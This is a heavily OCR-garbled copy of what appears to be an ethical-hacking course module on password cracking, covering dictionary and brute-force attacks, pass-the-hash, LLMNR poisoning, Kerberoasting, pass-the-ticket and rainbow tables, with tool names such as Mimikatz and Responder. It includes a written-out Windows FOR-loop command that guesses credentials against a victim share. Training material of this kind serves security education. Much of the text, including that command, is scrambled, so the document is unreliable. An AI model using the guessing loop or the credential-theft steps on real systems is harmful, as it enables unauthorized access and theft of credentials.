inputsthemon the
ctin’s
machine to eraek
thepasswords
Keyin each
reine
||tam || fear password,
unt the
correct passwords
discovered
ical andCountermensores
Mackin ©by E-Comel
Copyright
DefaultPasswords.
\@ Atachers
use default
passwords inthe Istofwordsor tionary that they
present use to perform
password
guesing
PRBcpenset rns
Calin Panewer
p/m
tools o Search Deal
forpoundeodcom
eoopeseors
n/t
ap/feotoosuads a
ntps://efoue-possword
info
|©The
attacker
installs
andpasswords
aTojan/Spyware/Keylgger
on thevictim's
machineto collectthevii’ usernames
|G. TheTojan/Spyware/Keylogger
runs inthebackground
andsends
back
redentiasto
ll user the attacker
eo‘Sin OP
sso.
Qe
6
Module 567
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Active Online Attacks: Hash Injection/Pass-the-Hash
(PtH)Attack CEH
to network
hash validate resources
3
heatacher
nda extract logged
6
Module S62
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
Active Online Attacks:Internal Monologue
Attack
(©.
Axachersperform
‘mode
monologue
an internal attack
where localprocedure
application,
NetNTIMresponse
i n thecontest of thelogged-on
SSX(secur Support
using
callt o theNTLMauthentication
use
Interface
Provider
a from
ivoked oclel
packages
user
he
[SRelpsacta nduc
th wer
ia tw tan eer count nd och tet fo ota the posed
6
Module 569
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
ActiveOnline Attacks:PasstheTicketAttack
dsser machineot by
stealing
theSV7TGT
plaintext
is
no
aparticular
ciphertext.
usedto produce
ofbreaking
the ofacipher
cipher. oris Thedetection key plaintext
fasterthan a brute-forceattackis one way A
methodexiststo break it otherthan a brute-forceattack.In general,
that
secure if
all ciphers
are
deficient in mathematicalproof If the user chooseskeys
of security. randomly or
searches randomly, the plaintext
will becomeavailableon averageafterthe system has
‘Some
of
tried half allthe possible
of theconsiderations
keys.
for brute-forceattacksare as follows:
0 Itisa time-consumingprocess
© All passwordswill eventually
befound
Rule-based
Attack
use this typeof attackwhen theyobtainsome information
‘Attackers aboutthe
password.
This is a more powerful
attack than dictionary
and brute-forceattacks
because
thecrackerknowsthe password type.Forexample,
if theattackerknowsthat
the password number,he/she
contains a two- or three-digit can use some specific
techniques
Byobtaining
to
extract the password
quickly.
usefulinformation,suchas the methodi n whichnumbersand/or special
characters havebeenused,and password length,attackersc an minimize the time
requiredto crackthe passwordandthereforeenhancethe cracking tool.Thistechnique
involvesbruteforce,a dictionary,
andsyllableattacks.
Foronline password-crackingattacks,
an attackerwill sometimesuse a combination of
bothbruteforceanda dictionary.
Thiscombination of hybrid
fallsinto the categories
andsyllable
password-cracking
attacks.
© Hybrid
Attack
Thistypeof attackdepends on the dictionary attack.Often, peoplechange their
passwords merely byadding some numbers to their old passwords.
In this case,the
programwouldaddsome numbersandsymbols to the wordsfromthe dictionary to
tryto crackthe password. Forexample, iftheold password is “system,―
thenthereis
a chance thatthe person will change it to “system―
or “system2.―
ical andCountermensores
Mackin ©by E-Comel
Copyright
©.
SyllableAttack
cracking
technique
Hackersuse this when passwords are not known words.
‘Attackers
ofthem,
combinations andmethods
use the dictionary other to crackthem,as well as all possible
Guessing
Password
Password technique
guessingi s a password-cracking that involves to logon
attempting
to the targetsystem with differentpasswords manually. Guessingis the key
elementof
manualpassword cracking.Theattackercreates a listofall possible
passwords fromthe
informationcollectedthrough socialengineering or any other methodand tries them
manually on thevictim’s
machine to crackthepasswords.
Thefollowing
are the stepsinvolvedin password
guessing:
a
Find valid user
Createa listof possible
passwords
Rankpasswords
from high
to low probability
©. Keyi n eachpassword,
untilthe correct password
is discovered
Hackerscan crackpasswords manually or by usingautomatedtools,methods, and
algorithms.
Theycan also automate password cracking usinga simpleFOR loop,or
create a scriptfile that tries each password i n a list. These techniques
are still
considered
‘Manual
manualcracking,
Password-Cracking
Algorithm
of of
Thefailurerate this type attack is high.
form,thisalgorithm
In its simplest can automate password
guessingusinga simple
FOR
loop.
In the example
that follows,
an attackercreates a simple
text file with usernames
andpasswords
anditerates themusingtheFORloop.
Themain FORloopcan extract the usernamesand passwords fromthe text file,which
serves as a dictionaryas it iterates through
every line:
[file: credentials. txt]
adninistrator
adninistrator password
administrator administrator
[ete]
Typethe followingcommands to access the text file froma directory:
e:\>FOR/F "tokens=1,2*" 4i in (credentials. txt)*
More? do net use \\victim.com\IPC$ %}/u:victim.com\si*
More? 2>>nu1*
More? G6 echo Stimet tdatet >> outfile. txt―
More? && echo \\victim.com acct: $i pass: ¢)>> outfile.ext
c:\ptype outfile.txt
ical andCountermensores
Mackin ©by E-Comel
Copyright
Theoutfile.txtfilecontains the correct username and password,
if the username and
password
i n credentials.txt
are correct. An attackercan establishan open session with
thevictim server usinghis/her
system,
DefaultPasswords
Default passwords are those supplied bymanufacturerswith new equipment (eg.,
switches,hubs, routers). Usually,default passwords provided bythe manufacturers of
password-protected devicesallowthe user to accessthedeviceduring the initial setup
andthen change the password. However, often an administratorwill ether forget to set
the new password or ignorethe password-change recommendation andcontinue using
the original
password, Attackerscan exploitthis lapseandfind the defaultpassword for
the targetdevicefrommanufacturer websitesor usingonlinetools thatshowdefault
passwords to access the targetdevicesuccessfully. Attackersuse default passwords in
thelistofwordsor dictionary thattheyuse to perform password-guessing attacks.
Thefollowing are someoftheonline toolsto searchdefaultpasswords:
hnttp://open-sez.me
https://www.fortypoundhead.com
httpsi//crt.net
http://uwew.defaultpossword.us
http://defaultpasswords
in
https://wurw.routerpasswords.com
https://defoult-password
info
showing
Figure68:Screenshot
defaut
ical
passwords
andCountermensores
Mackin ©by E-Comel
Copyright
Trojans/Spyware/Keyloggers
{ATrojanis a programthat masksitself as a benign application.
Thesoftwareinitially
appearsto perform a desirableor benign function,but insteadstealsinformationor
harmsthe system. With a Trojan,attackerscan gainremote accessandperform various
limitedbyuser privileges
‘operations on the targetcomputer.
is a typeof malware
‘Spyware that attackers
installo n a computer to secretly
gather
informationabout its users withouttheir knowledge. Spyware hidesitselffromthe user
andcan bedifficultto detect.
A keylogger all user keystrokes
is @programthatrecords withouttheuser'sknowledge.
Keyloggers
shipthe logof user Keystrokes
to an attacker'smachineor hide it in the
machinefor later retrieval.Theattackerthen scrutinizes the logto find
vietim’s
passwords
or otherusefulinformationthat couldcompromisethe system.
attackerinstalls a
‘An Trojan/spyware/keylogger
o n a victim'smachineto collecttheir
usernames and passwords.
Theseprogramsr un i n the background
and sendbackall
user credentials
to the attacker.
For example,a key loggeron a victim’s
computer can reveal
the contents of all user
emails.The following image depicts a scenario describing
how an attacker gains
passwordaccess usinga Trojan/spyware/keylogger.
6
Figure9:Activeonine
HashInjection/Pass-the-Hash (PtH)
attack
Attack
usingTolan/spyware/keylogger
ical andCountermensores
Mackin ©by E-Comel
Copyright
ED)
mean Berroa
>
‘User
computer
Figure620:
Hash
injection attack
artacer
thisapproachof
offline usage these cachedhashesc an berestrictedbythenetworkadmin.Hence,
maynot always befeasible.
Theattackerdumps the password hashesfrom the localuser account databaseor
SAM to retrieve password hashes
oflocalusers,andgainsaccessto adminaccounts
to compromise otherconnected systems.
Theattackercaptures LM or NTLMchallenge-response messages betweentheclient
to
andserver extract encrypted hashes through brute-forcing,
Theattackerretrieves thecredentialsof localusers as well as thosebelonging to the
security domain fromtheWindowsIsass.exe process.
Thehackercarries out thisattackbyimplementing the followingfive steps:
©. Thehackercompromisesone workstation/server using a local/remoteexploit.
Thehacker extracts storedhashes usingtoolssuchas pwdump7, Mimikatz,etc. and
a
finds domainadmin
account
hash.
The hackeruses tools suchas Mimikatzto place one of the retrievedhashes in
his/her local Isass.exe processandthen uses the hashto logon to any system
{domain controller) with the samecredentials.
Thehackerextracts all the hashesfromthe ActiveDirectory databaseandcan now
any
‘compromise account i n thedomain.
ical andCountermensores
Mackin ©by E-Comel
Copyright
LLMNR/NBT-NS
Poisoning
LLMINR LocalMulticastNameResolution)
(Link andNBT-NS NameService)
(NetBIOS are
main elements
‘two of WindowsOSsusedto performname resolution
for hostspresent
on the same link.Theseservicesare enabledbydefaulti n WindowsOSs.
When the ONS server fails to resolve name queries, the host performs an
unauthenticated UDPbroadcast asking all the hostsif anyonehas a name that it is
looking for.Asthe hosttryingto connect is following a n unauthenticatedandbroadcast
process, it becomes easyforan attackerto passivelylistento a networkfor LLMINR(UDP
port 5355)and NBT-NS(UDPport 137)broadcastsand respond to the request
pretending to be a targethost.After accepting a connection with a host,the attacker
can utilizetoolssuchas Responder.py or Metasploit to forwardthe request to a rogue
server (forinstance, to perform
TCP:137) an authentication process
During the authentication process,the attacker sendsan NTLMv2hashto the rogue
server, whichwas obtainedfrom the host tryingto authenticateitself. Thishash is
storedi n a diskandcan becracked usingofflinehash-cracking toolssuchas hashcat or
Johnthe Ripper. Oncecracked,thesecredentialsc an beusedto login andgainaccessto
the legitimate hostsystem
involvedi n LLMNR/NBT-NS
Steps poisoning:
1. Theuser sendsa requestto connect to the data-sharing \\DataServer,
system, which
shemistakenlytypedas \\DtaServr.
responds
The\\DataServer to the user, sayingthat it doesnot knowthehostnamed
\\OtaServr.
The user then performs
a LLMNR/NBT-NS
broadcastto find out if anyonei n the
networkknowsthe hostname\\DtaServr.
to the user sayingthat it is \\DataServer,
The attackerreplies the
accepts user
NTLMv2 hash,andresponds to the user
with
an error.
cumin
2
\oeasene―
WoFOUN
Atacte responds
vying
thot be hows WDSc
6.11: UMNR/NBT-NS
Figure poisoningattack
ical andCountermensores
Mackin ©by E-Comel
Copyright
LUMNR/NBT-NS Tools
Poisoning
© Responder
Source:https://github.com
(NetBIOS
responds
isan
Responder LLMINR,
NameService)
NBT-NS, andMDNSpoisoner.It responds to specific
queriesbasedon their name suffix.Bydefault,
to a File Server Service request,
NBT-NS
the tool only
which is for SMB. As showni n the
screenshots,
attackersuse the Responder tool to extract informationsuchas the
targetsystem’s
OSversion, clientversion, NTLMclientIP address, NTLMusername,
andpassword
hash.
vbuntu@ubuntu:~/Responder
-1
(Responder.9yens
Figure6.12; of Responder
Screenshot
6
Module P3g0577 ical
and ©
Mackin Countermensores
Copyright
by E-Comel
ubuntu@ubuntu:
~/Responder
Figure613:
Screenshot showing
oftheoutputof Responder NTLMhashes
Internal MonologueAttack
Theinternalmonologue attackis similarto the attackperformedusingMimikatz, except
thatthememoryarea of the LocalSecurity Authority SubsystemService(LSASS) process
is not dumped, thereby avoiding WindowsCredentialGuardandantivirus. Mimikatzis a
post-exploitation tool, throughwhich attackerscan extract plaintext passwords,
Kerberos tickets,andNTLMhashes fromLSASS processmemory. Attackersuse Mimikatz
to retrieve user credentialsfromLSASS processmemory,andtheacquired information
helps themin performing lateralmovement i n the post-exploitation
phase.
internal monologue
‘An attack is usually
performed i n a secure environment where
Mimikatzcannot be executed.In this attack, using the Security Support Provider
Interface(SSP) from a user-modeapplication, a local procedure call to the NTLM
authenticationpackageis invokedto calculate
the NetNTLMresponsein the context of
the logged-on
user.
to
Steps perform
an internalmonologue
1. Theattacker
disables
attack:
controlsof NetNTLMv1bymodifying
thesecurity thevaluesof
LMCompatibilityLevel,
NTLMMinClientSec,andRestrictSendingNTLMTraffic.
attackerextracts allthe non-networklogon
‘The tokensfromall the active processes
to as legitimate
masquerade users,
6
Module S78
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
Now,the attackerinteracts with NTLMSSPlocally,
foreachmasqueraded user to
‘obtain
user,
a NetNTLMV1 responseto thechosenchallenge
i n the security
context that
of
Now, the attacker restores NTLMMinClientSec,
LMCompatibilityLevel, and
RestrictSendingNTLMTraffic
to theiractualvalues.
Theattacker
usesrainbowtables theNTLMhashofthecaptured
to crack responses.
Finally,
theattackerusesthecrackedhashesto gainsystem-level
access,
Qn
Sentosa een
nee
emeeeh
ct
Cracking
Kerberos
6.14:Depiction
Figute
Password
of
internalmonologue
attack
Kerberos
is the most commonly
usedauthenticationprotocol for networkentities. Due
widespread
to its it is susceptible
acceptance, to various attacks.Attackershave
developed andexploit
various waysto hackinto Kerberos its vulnerabilities
to crack
weak passwords, injectmaliciouscodes, and obtain informationabout the network
infrastructureand various network entities. AttackerstargetKerberosauthentication
protocolin two commen ways: namely, cracking the TGS,knownas Kerberoasting,
and
the TGT,knownas AS-REP
cracking Roasting
(Cracking
Roasting
AS-REP TGT)
In this attack,attackersrequest an authenticationticket (TGT) fromthe KOCi n the
form of an AS-REQ packet. If the user account exists,the KDCreplies with a TGT
encrypted with the account'scredentials.This allows attackersto receive an
encrypted ticket,whichcan then be savedofflineandfurthercrackedto obtainthe
password. Attackerscan perform this typeof attackboth actively and passively.In
an active scenario,attackers generate an AS-REP message for the user, whereasi n a
passivescenario,attackersobservean AS-REP message.
In Kerberosauthentication, the pre-authentication modeis enabledbydefaultandis
designed to prevent offlinepassword-guessing attacks.Therefore, to perform an AS.
REPRoasting attack, attackersmust identify user accountswith pre-authentication
mode disabled, i.e., the user account must be set to "Do not require Kerberos
authentication.―Attackersuse tools suchas Rubeusto perform AS-REP roasting
attacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
following
‘The Roasting:
stepsare involvedi n AS-REP
1. The attacker identifies a user account with the pre-authentication
option
disabled.
Onbehalfoftheuser, theattackerrequests ticket(TGT)
an authentication from
thedomaincontrolleror KOC.
domaincontrollerverifiesthe user account andreplies
‘The with a TGT encrypted
with theaccount's
credentials
Theattackerstores the TGToffline,
and cracksit to extract the user account
passwordand furtheraccessthenetworkentity
(here, the applicationserver).
Aeplcation
AS-REP
Figure6.15: Roasting
1gTGS)
Inthis attack, requesta TGSforthe service principal
attackers name (SPN)of the
targetservice account.Thisrequest is madeto thedomaincontrollerbyusinga valid
domainuser'sauthentication ticket(TGT).Thedomain controller doesnot haveany
records;if the user hasaccessed the networkresources,
it just searches
the SPNi n
the Active Directory, with a n encrypted
and further replies ticket usinga service
account linked with SPN.The typeof encryption usedfor the requested service
ticket (ST)is RC4_HMAC_MDS, whichindicatesthat for encrypting
the ST,the NTLM
password hashis used.To crackthe ST,attackersexportthe TGSticketsfrom
memory and save them offline to the local system. Furthermore, attackersuse
differentNTLMhashesto crackthe STand,o n successfully cracking it, the service
account password can be discovered.Attackersuse tools suchas Kerberoastto
perform attacks
Kerberoasting o n Kerberos
authentication.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing
stepsare involvedi n Kerberoasting
a n authenticationticket (TGT)
1. Onbehalfof a user,the attackerrequests from
‘the
domaincontrolleror KOC.
verifiesthe user account andreplies
The domaincontroller with an encrypted
Ter.
Witha validuser authenticationticket(T6T),
the attackerrequests
the TGS
Thedomaincontroller
verifies
theTGTandreplies
Theattackerstores the TGSticket offline,
witha
TGS
ticket.
and cracksit to extract the service
account passwordandfurther access the networkentity(here, the application
server).
Domain
controter/KOC
pepiication
Figure
6.16:Kerberoastng
Pass-the-Ticket
Attack
Pass-the-ticket is a technique usedfor authenticating a user to a system that is using
Kerberos ticketswithout providing password.
the user’s Kerberosauthenticationallows
users to access services provided byremote servers without the need to provide
passwords for every requested service. To perform this attack,the attackerdumps
Kerberos ticketsof legitimate accountsusingcredentialdumping tools.
ATGT or STcan becaptured basedon the levelof access permitted to a client.Here, the
STpermitsaccessto specific resources, andtheTGTis usedto senda request to theTGS
ST
for the to access all the services theclienthasbeenauthorizedto access,
SilverTicketsare captured for resources that use Kerberos for the authentication
process,andcan beusedto create ticketsto call a specific service andaccessthe system
the
thatoffers service.
Goldenticketsare captured forthedomainwiththe KDSKRBTGT NTLMhashthat allows
the creation of TGTsfor any profilei n the Active Directory.
ical andCountermensores
Mackin ©by E-Comel
Copyright
launchpass-the-ticket
‘Attackers attackseitherbystealing theST/TGT froman end-user
machineand usingit to disguise themselves as a valid user, or bystealing
the ST/TGT
froma compromised AS.Afterobtaining one of thesetickets, an attacker
can gain
unauthorizedaccess to the networkservices andsearchfor additionalpermissionsand
criticaldata.
Attackersuse tools suchas Mimikatz,Rubeus,WindowsCredentialsEditor,etc. to
launchpass-the-ticket
attacks:
© Mimikatz
Source:https://github.com
Mimikatzallowsattackersto passKerberos TGTto othercomputersandsigni n using
the victim'sticket.Thetool alsohelps plaintext
i n extracting passwords, hashes,PIN
codes,and Kerberosticketsfrom memory.It is an open-source tool that enables
anyoneto see and store authenticationdatasuchas Kerberos
tickets,Attackerscan
leverage thisfor privilege
escalation
andcredentialstealing.
of
Sereenshot Mimikatz
Figure 6.17;
ical andCountermensores
Mackin ©by E-Comel
Copyright
OtherActive Online Attacks
©
Finda valid
Build your
target
user.
own two dictionariesor downloadtwo differentwordlistdictionaries
fromonlinesources
Createa final wordlistbymergingentries of two separatedictionaries.Forexample,
if the first dictionary
contains 100 words, and the seconddictionary contains 70
words, thenthe merged dictionary
contains 100x 70 = 7000words.
Useautomatedtools,suchas hashcat,
to crackthe password of the targetuser.
perform
‘Attackers thistypeof password
crackingi n a situation wherea randomphrase
Fingerprint
Attack
as
ofwordsis used a defaultpassword
generationprocedure.
In a fingerprint
attack,
the passphrase
is brokendown into fingerprints
consistingof
single-and multi-character
combinationsthat a targetuser might
choosea s his/her
password. For example, for a word ‘password’,
this technique
would create
ical andCountermensores
Mackin ©by E-Comel
Copyright
“p’,
“a―,
perform
usually "w",
"x", “wo",
fingerprints "s","s",
etc, "0", “a,
thisattackto crackcomplex
"pa", "ss",
passwords
“xd,Attackers
suchas "pass-10'
this
attack,
To perform
password
hashdatabase,
attackerscreate a listof uniquepassword
andthenperform
a brute-force
hashes
froma leaked
attackto obtaina wordlistand
further attack
fingerprint
startthe
Attack
PRINCE
PRobability
‘A INfinite ChainedElements(PRINCE) attackis an advancedversion of a
combinatorattack i n which, insteadof taking inputsfrom two differentdictionaries,
use
a dictionary
attackers single input
chainof words.For example,
to buildchainsof combinedwords.Thischaincan
havebetween1 andn wordsfromthe inputdictionary
if the length
concatenatedtogether
of charactersto be guessed
to forma
is 5, then the
following
combinations are created fromthe inputdictionary:
S-letter
word
3-letterword+ 2letter word
letter word + 3-letterword
letter word + 4-letterword
ete
Toggle-Case
Attack
In a toggle-case
attack,attackerstry all possibleupper-caseand lower-case
of a word presenti n the input dictionary.
combinations For example,
if a word i n the
inputdictionary thefollowing
is “xyz―, set ofcombinations
is generated:
xyz
xyz
xyz
xyz,
xyz
ete
Thesuccess
©
rate
of
IFusersuse
thisattackis lowfor the following
upper-case letters,
reasons:
ical andCountermensores
Mackin ©by E-Comel
Copyright
a new alphabet
characterelements, is developed,
whichis thenmatchedwith the
existingpassword
database.
phase
In the initial of this attack, attackersset a threshold parameter for the
occurrencesof the elements, and onlythe letters presenti n the new alphabet
that
at least the minimum numberof times are selected.Furthermore,
‘occurred this
techniquecombinesthe selectedletters into wordswith a maximum length of eight
andthena dictionary
characters, attackis performed password.
to crackthe target
ical andCountermensores
Mackin ©by E-Comel
Copyright
PassiveOnline Attacks:Wire Sniffing
rafthe to
record
network
(©Attackers sniffertoolson
run packet localares network (LAN) access
‘and therw
(©Thecaptured suchas passwords
and
data mayinclude
senttiveinformation
{FTPloginsessions, ee) emails
(©-Sritfed
credentials
ae sed to i n unauthorized
acces tothe targetsytem
Wire Sniffing
Complex Computationally *\\ Hard to Perpetrate
of pay
|
PassiveOnline Attacks:Man-in-the-Middleand Replay
Attacks
C/EH
(©inane
andtheserver
attack,
thecommunication
to
theattacker
channels
extract
acquires
between
access to
thevitim
theinformation
nended
iceakiderstions
Relatively
hardto perpetrate
(©na eplayaac, packets
ave captured
and authentication
tokens
a sife. Afterthe relevant
Must betrustedbyone or
sides
both
informations
extracted,
ae
using
thetokens placed back Cansometimes by
bebroken
fon thenetwork to gainaccess levaldating
wae
Passive
=
Online
Wire Sniffing
Attacks
Packetsniffing
is a formof wire sniffing in whichhackers
or wiretapping sniffcredentials
during
transit bycapturing Attackersrarely
Internetpackets. to perform
use sniffers this
typeof attack.With packet
sniffing,
an attackercan gainpasswords to applications
such
as email,
websites,SMB,FTP,rlogin
sessions,or SQL.As sniffersrun i n the background,
the victim remains unaware
ofthe
sniffing,
6
Module PageS86 ical andCountermensores
Mackin Copyright
©
by E-Comel
sree
sniffers,
data sent to andfrom any other system
tools are ideally
as they
of
o n the LAN.Themajority sniffer
suitedto sniffdata i n a hubenvironment.Thesetools are passive
passively wait for datatransferbeforecapturing the information.They
are efficient at imperceptibly gatheringdata from the LAN, The captured data may
includepasswords sent to remote systems during FTP,rloginsessions,and electronic
mail.The attackeruses thesesniffedcredentialsto gain unauthorizedaccess to the
targetsystem, Thereare a varietyof toolsavailableon the Internet for passivewire
sniffing,
andReplay
‘Man-in-the-Middle Attacks
Whentwo partiesare communicating, 2 man-in-the-middle(MITM) attackcan take
place,
i n which a third partyinterceptsa communication betweenthe two parties
withouttheirknowledge. Thethird partyeavesdrops
on the trafficand thenpassesit
along.
Todo this,the “man
simultaneously.
i n the middle―
In an MITM attack, the attacker of
hasto snifffrombothsides the connection
acquiresaccessto the communication
channelsbetweenthe victim andserver to extract the information.Thistypeof attackis
oftenusedin telnetandwireless technologies. It is not easyto implement suchattacks
to the TCPsequence
‘owing numbersandthe speed of the communication.Thismethod
is relatively andcan sometimes bebrokenbyinvalidating
hardto perpetrate thetraffic.
ical andCountermensores
Mackin ©by E-Comel
Copyright
OfflineAttacks:RainbowTableAttack
sano
prcnnas
bea st
(©
ADstrbutedNetwork
protected
filesusing Attack across
theunused
{ONA)
the
i used
technique forrecovering
powerofmachines
processing
fromhashes
passwords or password!
network
‘The coordinatesthe
DNAManager
attackportion
nd allocates
small ofthekey
s earch
to machines
tat
‘The
ONAClient runs
inthe
background onyunusedprocessor
consuming tine
‘The combines
program
crackthepassword the capabitlsofl the dents connectedtothe networkanduses
processing it to
Offline Attacks
the validity
Offlineattacksoccur whentheintruderchecks of passwords. observeshow
He/she
the password
is stored.If the usernames and passwords
are stored i n a readablefile,it
becomes
easyforthe attackerto gainaccessto the system.
Hence,
it is important
to protect
thelistof passwords
and keep encrypted.
form,preferably
i t i n an unreadable
ical andCountermensores
Mackin ©by E-Comel
Copyright
although
Offlineattacks, are successful
time-consuming, dueto their smallkeyspace
andshort
length.
Notably,
‘Two examples
techniques
on
the
differentpassword-cracking
of offlineattacksare as follows:
are available Internet
1. Rainbow
2.
table
Distributed
attack
NetworkAttack
=
Table
Rainbow Attack
rainbowtableattackuses the cryptanalytic
‘A time-memory trade-offtechnique,which
requireslesstime thanother techniques. It usesalready-calculated
information stored
i n memory to crackthe encryption.In the rainbowtable attack,
the attackercreates a
table ofall the possible andtheirrespective
passwords hashvalues,
knownas a rainbow
table,i n advance.
1gqazwed
hhO21da 0
»4259ec34599c530b28a6a8£2254668590
744171 6cb£Bd4dd0£
£4ce31a177151
SdaBdast +» 3ed696a8571a843cda453a229d741843
sodifo8st ¢744b171
6cb£8d4dd0f
igure6.20:Pre-computed
hashes
£4ce31a177151
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackersuse the rtgentool of this projectto generate
the rainbow tables.As showni n
the screenshot,the rtgenprogram needsseveralparameters to generate a rainbow
table,
Thesyntax of thecommand
line is:
Syntax:rtgen hash_algorithm
plaintext_len max
table min
charset plaintext_len
index chain_lenchain_num
part_index
Figure621:
utedNetworkAttack
A Distributed NetworkAttack(DNA) is a technique used for recoveringpassword
protected filesthat utilizethe unusedprocessingpower of machines spreadacrossthe
networkto decrypt passwords. In this attack,the attackerinstalls a DNA manageri n a
centrallocationwheremachines
DNA managercoordinates
machines
clients
runningDNA
the attackand assigns
distributedthroughout
can accessit over a network.The
smallportionsof the keysearchto
the network.TheDNAclient runs in the background,
onlytaking the processor time that was unused.Theprogramcombines the processing
capabilities of all the clientsconnectedto the network and uses it to crackthe
password. Attackersuse the Password Recovery Toolkit(PRTK),whichis equipped with
DNAtools,to perform thisattack
©.
ofa and
Thefeatures
Easily
reads
DNAare as follows:
graphs
statistics
©. Addsuser password
dictionariesto cracka
© Optimizes
password forspecific
attacks languages
ical andCountermensores
Mackin ©by E-Comel
Copyright
Modifies
the user dictionaries
Comprises
stealthclientinstallationfunctionality
Automatically
updates clientwhileupdating theDNAserver
DNAcan beclassified
into two modules:
DNA
Server
‘The
Interface
DNAserver interfaceallowsusersto manageDNAfroma server. TheDNAserver
moduleprovides the user with the status of all the jobsthat the DNA server is
containsthefollowing
Theinterface
executing, jobs’
* Thecurrent jobqueueconsistsofall thejobs
CurrentJobs: addedto the list by
the controller.Thecurrent joblist hasmany columns,suchas the identification
numberassigned bythe DNAto the job,the name of the encrypted file,the
user'spassword, the passwordthat matchesa keythat can unlockthe data, the
status
ofthe
job, other
and various columns.
FinishedJobs:Thefinishedjoblist provides informationaboutthe decryption
jobs,including the password. It alsohasmanycolumnsthat are similarto the
current joblist. Thesecolumnsincludethe identificationnumberassigned by
DNAto the job,the name of the encrypted file,the decrypted
pathof the file,
the keyusedto encrypt and decrypt the file,the dateand time that the DNA
server startedworking on the job,the date and time the DNAserver finished
working on the job,the elapsed time,ete.
DNA ClientInterface
Userscan use the DNAclientinterface frommanyworkstations. Theinterfacehelps
the client statisticsto coordinateeasily
and is availableon machines
with the pre-
installedDNAclientapplication. Thereare severalcomponents, suchasthe name of
the DNAclient, the name of the group to whichthe DNAclient belongs, and the
statisticsaboutthecurrent job.
NetworkManagement
TheNetworkTrafficdialog
boxaidsi n the discoveryof the networkspeedthe DNAuses
and each work-unitlength the work-unitlength,
of the DNA client. Using a DNA client
‘can
at
DNAserver the beginning theof
workwithout contacting DNAserver. TheDNA
andend the work-unitlength. client contact
application
can the
speed
length
‘work-unit
of
increases,thespeed the networktrafficdecreases.
of the traffic leadsthe client working
time. Therefore,
on the jobsto spend
the user can makefewer requests
A decrease
longer
i n the
amounts of
to the server becauseof the
of
reductionin the bandwidth network traffic.
ical andCountermensores
Mackin ©by E-Comel
Copyright
PasswordRecovery
Tools
Eloonsoft
Distributed
Passwordassord
Recovery Recovery Toit
Soames
hey,an
rong eneypton nls 9 prc nena,
PasswordRecovery
Tools
Passwordrecovery tools allow attackersto break complex
passwords,
recover strong
andunlockseveral
keys,
encryption documents.
=
_Elcomsoft
Distributed
Password
Recovery
Source:https://www.elcomsoft.com
The ElcomsoftDistributedPasswordRecoveryapplication
allowsattackersto break
complex passwords, keys,and unlockdocumentsi n a
recover strongencryption
production
environment.
Attackerscan use this tool to recover the passwordsof the targetsystemto gain
unauthorizeda ccess
tothefiles
critical andothersystem
software.
ical andCountermensores
Mackin ©by E-Comel
Copyright
622; Screenshotof Eleomsol
Figure OistributedPassword Recovery
Someofthe password
recoverytoolsare listedas follows:
Password Recovery Toolkit(https://accessdata.com)
=
Passware (https://www.passware.com)
Kit Forensic
+
hashcat(https://hashcat.net)
Windows Tool(https://www.windowspasswordsrecovery.com)
Recovery
Password
(hetps://www.top-password.com)
PCUnlocker
ical andCountermensores
Mackin ©by E-Comel
Copyright
Toolsto Extractthe PasswordHashes
pwdump7 ‘Tools
to Extractthe
‘Password
Hashes
(©
the
Security
Account
pwdump?
from
(SAM)of
extractsLM and NTLMpasswordhashes lca
Manager database
use accounts
Minka
(heps://habs.com)
(heps//athub.com)
Dstneals Powershell
(eo //itbubscom)
Nedoaract
(h95//ihubs
com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
shownin thescreenshot,
‘As attackersuse thistool to extract password
hashes
fromthe
targetsystem,
Figure6.2:Sreesho of pwd?
toolsto extract password
Someoftheadditional hashes
are asfollows:
+
Mimikate(https://github.com)
+
Empire
Powershell (https://aithub.com)
+
DSinternals (https://github.com)
PowerShell
=
(https://aithub.com)
Ntdsxtract
privileges
Note:Theuse ofthe abovetoolsrequiresadministrative on the remote system,
ical andCountermensores
Mackin ©by E-Comel
Copyright
i}
and ophcrackCEH
Tools:LOphtCrack
Password-Cracking
Lophcacisa
Lophtcrack| jesewors
tcl
ad |]
cover
devenedtoset
apkstons gphcrack| onrantow tals eames wih Gopal
Password-Cracking
Tools
RainbowCrack
|
rainbow
tblshoses [BEetone
tmememory toner
hasheat
Password-Cracking
Tools
tools allow you to reset unknownor lost Windowslocal administrator,
Password-cracking
domainadministrator, In the case of forgotten
andother user account passwords. passwords,
it
even allowsusers instant without reinstalling
access to their locked computer Windows.
Attackerscan use password-cracking
toolsto crackthe passwords
of the target
system.
Module
6 596
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
toolsare listedas follows.
Somepassword-cracking
=
Lophtcrack
Source:https://www.lOphtcrack.com
LophtCrackis a tool designedto audit passwords and recover applications.
It recovers
lostMicrosoftWindowspasswords hybrid,
with the helpof a dictionary, rainbowtable,
andbrute-forceattacks,andit alsochecks the strength
of the password.
shownin the screenshot,
‘As attackers u se LOphtCrackto crackthe password of the
targetto gainaccessto the system.
Figure6.24;
of
Screenshot
Lophtcrack
Module
6 597
Page ical
and
Mackin
‘AEN ©
Reserve.
Promote
Countermensores by E-Comel
Copyright
Reproduction
Sty
=
opherack
Source:http://ophcrack.sourceforge.net
opherack
is a Windowspassword-cracking
tool that uses rainbowtablesfor cracking
passwords.
It comes with a graphical
Linux/UNIX,
Windows,
as etc.
(GUI)
user interface andruns on different such
OSs
showni n the screenshot,
‘As attackersuse ophcrack
to perform
brute-forceattacksand
crackpassword
hashes
ofthetargetsystem.
of opherack
Figure625:Screenshot
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
RainbowCrack
Source:http://project-rainbowerack.com
RainbowCrack
crackshasheswith rainbowtables, using a time-memory trade-off
algorithm.
A traditionalbrute-force
cracker
cracks
hashi n a manner that is different
from that followed bya time-memory-tradeoff hashcracker.Thebrute-forcehash
cracker plaintexts
tries all possible one afterthe otherduring cracking.In contrast,
RainbowCrack pre-computesall the possible plaintext
hashpairs i n the selectedhash
algorithm, andplaintext
charset, lengthi n advance andstoresthemi n a “rainbowtable
file. It maytakea longtime to pre-compute the tables,
but once the pre-computation is
finished,
‘As
itis
possible
easily ciphertext
to
shownin the screenshot,
tables.
